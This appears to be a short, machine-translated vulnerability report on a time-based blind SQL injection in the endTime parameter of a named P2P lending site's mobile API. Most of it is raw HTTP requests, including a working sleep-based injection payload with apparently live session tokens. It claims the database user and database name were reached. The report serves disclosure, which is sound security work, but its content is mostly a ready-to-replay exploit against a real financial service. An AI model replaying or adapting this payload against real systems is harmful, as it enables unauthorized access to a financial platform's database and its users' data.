P2P financial security-the main site of jingjinlian has the SQL Injection Vulnerability (ROOT)
Objective: www.jjlwd.com
SQL Injection exists in the following areas: (endTime in POST, time blind injection)
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Length: 218Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.jjlwd.com/mobile/appService.doHost: www.jjlwd.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*auth=jjlwd&endTime=2015-12-30%2023%3A59%3A59&functionType=41&info=2015&page_count=10000&page_index=0&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&startTime=2015-12-01%2000%3A00%3A00&token=D5C0B188F68A8751a3547802&userID=41911
Payload: (2 seconds delayed)
POST http://www.jjlwd.com/mobile/appService.do HTTP/1.1Content-Length: 237Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.jjlwd.com/mobile/appService.doHost: www.jjlwd.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*auth=jjlwd&endTime='XOR(if(now()%3Dsysdate()%2Csleep(1)%2C0))AND'&functionType=41&info=2015&page_count=10000&page_index=0&sign=E2BFDCBE3EC3B2E291576EF46BFD9D29&startTime=2015-12-01+00%3A00%3A00&token=D5C0B188F68A8751a3547802&userID=41911
1. Current Database User
2. Current Database
Solution:
Please kindly advise ~